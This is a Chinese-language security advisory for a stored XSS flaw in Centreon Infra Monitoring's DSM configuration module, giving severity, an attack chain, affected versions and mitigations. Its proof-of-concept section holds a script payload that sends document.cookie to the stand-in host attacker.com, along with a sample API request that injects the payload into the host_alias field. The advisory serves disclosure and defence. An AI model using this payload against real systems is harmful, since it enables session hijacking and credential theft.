CVE-2025-12511 Centreon Infra Monitoring 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12511

漏洞类型

存储型XSS

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Centreon Infra Monitoring (DSM extension)

漏洞概述

CVE-2025-12511是Centreon Infra Monitoring（DSM extension配置模块）中存在的存储型跨站脚本（Stored XSS）漏洞，CVSS评分为6.8（中危）。该漏洞由于在Web页面生成过程中对用户输入的不当中和（Improper Neutralization of Input During Web Page Generation）导致。攻击者可以利用拥有高权限的账户在DSM扩展配置模块中注入恶意JavaScript脚本，这些脚本会被存储在服务器端。当其他拥有权限的用户访问受影响页面时，恶意脚本将自动执行，可能导致会话劫持、敏感信息窃取、恶意操作执行等严重后果。由于该漏洞为存储型XSS，恶意代码会持久存在于系统中，相比反射型XSS具有更大的危害性。Centreon是一款广泛使用的开源基础设施监控软件，常用于企业级IT环境，其DSM（Dynamic Service Monitoring）模块用于监控动态服务。该漏洞影响多个版本，需要及时修复以防止潜在的安全风险。

技术细节

该漏洞属于存储型跨站脚本（Stored XSS）漏洞，存在于Centreon Infra Monitoring的DSM扩展配置模块中。漏洞的根本原因是在处理用户输入时未对特殊字符进行充分的过滤和转义，导致恶意脚本可以被注入并永久存储在数据库中。攻击者需要具备高权限（如管理员权限）才能利用此漏洞，在配置模块的输入字段中插入包含JavaScript代码的恶意载荷。当其他用户通过Web界面访问相关配置页面时，这些存储的恶意脚本会被浏览器作为正常页面内容解析执行。攻击者可利用此漏洞窃取受害者的认证Cookie、劫持用户会话、执行任意操作、传播恶意软件或进行钓鱼攻击。由于Centreon是企业级监控平台，通常部署在内部网络中，攻击成功后可能进一步横向移动，获取更多系统权限。漏洞影响Centreon 25.10.0至25.10.1之前的版本、24.10.0至24.10.4之前的版本以及24.04.0至24.04.8之前的版本。修复版本分别为25.10.1、24.10.4和24.04.8。

攻击链分析

STEP 1

1

攻击者获取Centreon的高权限账户（如管理员账户）

STEP 2

2

攻击者访问Centreon Infra Monitoring的DSM扩展配置模块

STEP 3

3

在配置字段（如host_alias、描述字段等）中注入恶意JavaScript代码

STEP 4

4

恶意脚本被存储到数据库中，未经过滤或转义处理

STEP 5

5

其他拥有权限的用户访问受影响页面或API端点

STEP 6

6

浏览器解析页面时执行存储的恶意脚本

STEP 7

7

攻击者通过恶意脚本窃取Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-12511 PoC - Centreon DSM Extension Stored XSS
// This PoC demonstrates the stored XSS vulnerability in Centreon Infra Monitoring
// Requires high privilege account (e.g., admin)

// Malicious payload to be injected in DSM configuration module
const maliciousPayload = '<script>\n'
    + 'fetch("https://attacker.com/steal?cookie=" + document.cookie)\n'
    + '.then(response => response.text())\n'
    + '.then(data => console.log("Data stolen:", data));\n'
    + '</script>';

// Example: Inject via API or Web Interface
// POST /centreon/api/latest/dsm/config/hosts
const exploitRequest = {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'Cookie': 'PHPSESSID=admin_session_cookie'
    },
    body: JSON.stringify({
        host_name: 'DSM Service Monitor',
        host_alias: maliciousPayload,  // XSS payload injected here
        host_address: '127.0.0.1',
        host_template: 'generic-host',
        host_active_checks_enabled: '0',
        host_passive_checks_enabled: '1'
    })
};

// When other users visit the affected page, the script executes
// Example victim request:
// GET /centreon/api/latest/dsm/config/hosts
// Response will include the malicious script in HTML context

影响范围

Centreon Infra Monitoring 25.10.0 < 25.10.1

Centreon Infra Monitoring 24.10.0 < 24.10.4

Centreon Infra Monitoring 24.04.0 < 24.04.8

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：限制DSM配置模块的访问权限，仅允许必要的管理员访问；对所有配置输入实施严格的输入过滤，移除或转义<、>、"、'、script等危险字符；启用Web应用防火墙（WAF）规则检测和阻止XSS攻击载荷；监控用户访问日志，及时发现异常行为；考虑临时禁用DSM扩展模块直到完成安全更新。